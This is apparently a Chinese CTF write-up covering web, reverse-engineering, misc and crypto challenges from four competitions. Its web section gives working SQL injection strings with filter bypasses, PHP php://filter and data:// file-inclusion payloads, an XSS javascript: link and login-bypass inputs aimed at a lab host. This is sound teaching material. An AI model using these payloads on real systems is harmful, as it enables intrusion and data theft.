統(tǒng)計(jì)四場(chǎng)的所有題目（共計(jì)12題，四場(chǎng)比賽一共上了21題【包括換題】）
隨便記記，以免老題復(fù)用（已經(jīng)復(fù)用了）

Web

文件包含 1

偽協(xié)議
http://120.202.175.143:8011/?c=php://filter/convert.base64-encode/resource=hhb.php

PD9waHANCmlmIChmbm1hdGNoKCIqaGhiLnBocCoiLCRzdmlkMSkpew0KJHN2aWQ9ICdTVklEW25nNTQycGg5OHd5cjk3ZnF2NGMzcXZnOW5qazU0MjRlZWRdJzsNCn1lbHNlew0KZWNobyAndHJ5o6EnOw0KfQ0KPz4NCg==

base64解碼

<?php
if (fnmatch("*hhb.php*",$svid1)){
$svid= 'SVID[ng542ph98wyr97fqv4c3qvg9njk5424eed]';
}else{
echo 'try��';
}
?>

文件包含2

樂(lè)，共享靶機(jī)，被改 flag 了
快結(jié)束的時(shí)候光速換題（換成了上面那個(gè)文件包含）

data偽協(xié)議
?c=data://text/plain,<?php highlight_file("index.php");?>

<?php
if (isset($_GET['c']))
if (!fnmatch ("data*",$_GET['c'])){
echo 'GET c<br>$svid';
} else {
$svid='SVID[nwe9felwh309whec5469089ewfq2cpqr]';
include($_GET['c']);
}
else{
echo 'GET c<br>$svid';
exit;
}
?>

xss

Unicode繞過(guò) 【xsslab原題吧】
先登錄
example：123456
然后輸入：

javascript:alert()

點(diǎn)擊鏈接即可

SQL注入

sqlilab原題？
%0a繞過(guò)空格過(guò)濾

?id=0')uNIOn(sELEct(1),(2),(select(user())));%00
?id=0')union(select(1),2,(select%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()));%00
?id=0')union(select(1),2,(select%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name="users"));%00
?id=0%27)union(select(1),2,(select%0agroup_concat(password)%0afrom%0ausers));%00
http://120.202.175.143:8014/index/?id=0%27)uNIOn(sELEct(1),2,(select%0agroup_concat(title)%0afrom%0aarticle));%00

萬(wàn)能密碼1

非預(yù)期1： admin：admin直接登錄
非預(yù)期2：curl http://ip:port/svid.php
預(yù)期：（自認(rèn)為）
嘗試常規(guī)的萬(wàn)能用戶密碼，形如admin' or 1=1-- ,密碼默認(rèn)都無(wú)效，甚至都沒(méi)有提示
猜測(cè)密碼可能被hash加密了，就想到了萬(wàn)能字符串ffifdyop
打開(kāi)burp進(jìn)行爆破

http://120.202.175.143:8012/?uname=admin%27%20%23&passwd=ffifdyop

萬(wàn)能密碼2

非預(yù)期：curl http://ip:port/svid.php
預(yù)期：

?uname=like' UNION ALL SELECT CONCAT(1,2),NULL-- -&passwd=like

萬(wàn)能密碼3

非預(yù)期：curl http://ip:port/svid.php
預(yù)期：不知道啊

Reverse

re1

不會(huì) re 的都可以做

文件md5 hash為：9083aceef1a0c7ea36183fde040f721e
ida反編譯

unsigned __int64 __fastcall ba(__int64 a1, size_t *a2)
{size_t i; // [rsp+18h] [rbp-68h]char v4[20]; // [rsp+2Ch] [rbp-54h] BYREFchar v5[56]; // [rsp+40h] [rbp-40h] BYREFunsigned __int64 v6; // [rsp+78h] [rbp-8h]v6 = __readfsqword(0x28u);strcpy(&v4[6], "djqjnqdwfyl!");strcpy(v4, "flag{");pp(v5, v4, &v4[6]);pp(v5, v5, &unk_2004);*a2 = strlen(v5);for ( i = 0LL; i < *a2; ++i )*(_BYTE *)(a1 + i) = v5[i];return __readfsqword(0x28u) ^ v6;
}

unk_2004的值為}
ai就給分析出flag了

- strcpy(&v4[6], "djqjnqdwfyl!");：將"djqjnqdwfyl!"復(fù)制到v4[6]開(kāi)始的位置。
- strcpy(v4, "flag{");：將"flag{"復(fù)制到v4[0]。
- pp(v5, v4, &v4[6]);：假設(shè)pp是某種拼接函數(shù)（可能是strcat），將v4（"flag{"）和&v4[6]（"djqjnqdwfyl!"）拼接，結(jié)果存入v5，即v5 = "flag{djqjnqdwfyl!"。
- pp(v5, v5, &unk_2004);：將v5和某個(gè)未知字符串（unk_2004）拼接。

re2

ida反編譯看源碼

int __cdecl main(int argc, const char **argv, const char **envp)
{v10 = __readfsqword(0x28u);qmemcpy(v8, "Q[VPL{QVAz]PC^Z]R_QCH]VR_]NZMVSZ]ORM_[HV[SN^AJ", 46);v7 = 55;puts("Welcome to the secret decoder!");puts("Can you figure out the key to unlock the secret message?");puts("The message is hidden inside the program...");for ( i = 0; i <= 999999; ++i );for ( j = 0; *((_BYTE *)v8 + j); ++j );putchar(10);printf("Enter the decryption key (in hexadecimal): ");fgets(s, 100, _bss_start);__isoc99_sscanf(s, "%x", &v4);if ( v7 == v4 ){xor_encrypt_decrypt(v8, v7);printf("Decrypted: %s\n", (const char *)v8);}else{puts("Incorrect key. Try again!");}return 0;
}

如果輸入的v4等于v7，則解密成功
需要輸入16進(jìn)行 （%x)
55的十六進(jìn)制是0x37,輸入37

$ ./bb
Welcome to the secret decoder!
Can you figure out the key to unlock the secret message?
The message is hidden inside the program...Enter the decryption key (in hexadecimal): 37
Decrypted: flag{LfavMjgtimjehftjaehjymzadmjxezhlaldyiv}

Misc

RSA解密

壓縮包里面是一個(gè)flag.zip、rsa公鑰、密文文件
rsa公鑰很短，獲取到n可以進(jìn)行分解
使用RsaCtfTool

$  /opt/RsaCtfTool/RsaCtfTool.py --dumpkey --key rsa_public_key.pem
[!] Using native python functions for math, which is slow. install gmpy2 with: 'python3 -m pip install <module>'.
private argument is not set, the private key will not be displayed, even if recovered.
None
n: 99965623838843374711411183391444104726307314029768628656811347707805304989037
e: 65537

到https://factordb.com/ 分解n得到pq

生成私鑰

/opt/RsaCtfTool/RsaCtfTool.py -n 99965623838843374711411183391444104726307314029768628656811347707805304989037 -e 65537 -p 301421686937198008750983790559102741399 -q  331647085034301039007512063728344459163
-----BEGIN RSA PRIVATE KEY-----
MIGqAgEAAiEA3QKJvADgw3sTapG0Bx0KOYVJ+Uy4hfdWtz+fOhShpW0CAwEAAQIg
MzYtWEUTz/gq7ZzJjIRsI62ksoMYL9oST48H90zxqzkCEQDiw7SM9+Zjncud9oGi
q6uXAhEA+YDnu2zTMNUuGGmIUXFnmwIQe7V6hUEkfgnysD1v4Xe4BwIRAJ1GC0zS
sWFjz7WluD8WTCcCEDGBq/10a8U+kL+OpPxp0tM=
-----END RSA PRIVATE KEY-----

使用私鑰解密

$ openssl rsautl -decrypt -in venus.en -inkey 1.pem
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
key is 123!@#456

密碼是123!@#456
解壓壓縮包得到flag{78c46c7e7834474f972e3ed44413e27f}

對(duì)數(shù)據(jù)流量進(jìn)行分析

腳本梭哈

import os
import re
# os.system(r"tshark -r 1.pcapng -T fields -e usbhid.data > usbdata.txt")
normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i","0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r","16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1","1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0","28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[","30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/","39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>","40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I","0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R","16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!","1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")","28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{","30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?","39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>","40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
output = []
file = r'usbdata.txt'
with open(file, 'r') as file:contents = file.read().split()# print(contents)for cont in contents:if len(cont) == 16:# 兩個(gè)字符 '0000100000000000' => ['00', '00', '10', '00', '00', '00', '00', '00']a = re.findall('.{2}', cont)# print(":".join(a))cont = ":".join(a)  # 00:00:10:00:00:00:00:00try:# 去除不合條件的if cont[0] != '0' or (cont[1] != '0' and cont[1] != '2') or cont[3] != '0' or cont[4] != '0' or cont[9] != '0' or cont[10] != '0' or cont[12] != '0' or cont[13] != '0' or cont[15] != '0' or cont[16] != '0' or cont[18] != '0' or cont[19] != '0' or cont[21] != '0' or cont[22] != '0' or cont[6:8] == "00":continueif cont[6:8] in normalKeys.keys():# 沒(méi)有按 Shift 鍵if cont[1] != '2':output += normalKeys[cont[6:8]]# print(cont, output)# 按了 Shift 鍵else:output += shiftKeys[cont[6:8]]else:output += "??"  # 隨便except:pass
print("結(jié)果：",output)
flag = ""for i in range(0, len(output)):flag += output[i][0]
print(flag)
flag = re.sub("<CAP>(.*?)<CAP>", lambda matchStr: matchStr.group(1).upper(), flag)
# 循環(huán)去除 比如  aaaa<DEL><DEL>這種情況  => aa
while re.findall(r".<DEL>", flag, re.DOTALL):flag = re.sub(r".<DEL>", "", flag, re.DOTALL)
print(flag)

flag需要大寫，逆天
flag{A72BD409-B511-472B-A5A0-2F348BC5B9F3}

或者使用ctf-neta梭哈

Crypto

密碼的（0解）

現(xiàn)在有一個(gè)ctf題目： 小明向網(wǎng)谷杯主辦方發(fā)送了一條加密信息，并給出了加密代碼，遺憾的是，加密代碼也被加密了(300分) 密文信息：==DMeOzM6y2p0ZQB3LzpaMUAxOwZ0kTs 加密代碼：rgvsm06wIkr06uRuoKYFhipDMTZVpi11dxaycA1vo+FHOPxCbxHdkKDGT5M4dzsONhCYZPfBn7R3dCfpzIxwc5Y8Wp7exB44F69ys0vmqsZ4j+AM2zdWhmg+CctVlXWKFF4phnpgb0UhaV0l1JIAq5+AZ9bwZD6KWXkO9aVTeIbRGemcg1KfSCqCzd1Cjg790YjjWUTb84bM9RQdtlVS932Cg2jfHYwWCQJyB0MOCghQLwYcJryRb+JzJ568c5jwwqTymV4ZJbA1KUIl7KfE3+XjZON4q+nv20tuaXI0FW4Az266/u4a7ORXoKvljJbJFImER/mi0Yb8EuhF3CWLy07kAsYFYT7HHUNT1hGMnmTAVNHmmqXPZoOhnMcdmepJ4NEnXIDE1c0Vif+eZzRKuAxqXOB0Lf9CMQ==

原文